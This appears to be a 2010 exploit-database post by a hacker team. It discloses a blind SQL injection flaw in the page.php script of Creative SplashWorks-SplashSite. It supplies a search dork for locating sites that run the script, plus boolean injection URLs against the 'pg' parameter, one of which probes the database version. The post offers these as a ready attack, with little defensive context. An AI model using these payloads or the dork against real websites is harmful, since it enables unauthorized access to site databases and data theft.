Creative SplashWorks-SplashSite (page.php) Blind Sql Injection Vulnerability
============================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST

.:. Email          : F.Hack@w.cn

.:. Team           : Sec Attack Team

.:. Home           : www.sec-attack.com/vb

.:. Script         : Creative SplashWorks-SplashSite

.:. Language       : php

.:. Bug Type       : Blind Sql Injection

.:. Dork           : "Website Powered By Creative SplashWorks - SplashSite"

.:. Date           : 31/1/2010

####################################################################

===[ Exploit ]===

www.site.com/page.php?pg=18+and+1=1   >>>   True
www.site.com/page.php?pg=18+and+1=2   >>>   False

www.site.com/page.php?pg=18+and+substring(@@version,1,1)=5   >>>   True
www.site.com/page.php?pg=18+and+substring(@@version,1,1)=4   >>>   False


####################################################################

Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack
________________________________
Hotmail: Trusted email with Microsoft’s powerful SPAM protection. Sign up now.<https://signup.live.com/signup.aspx?id=60969>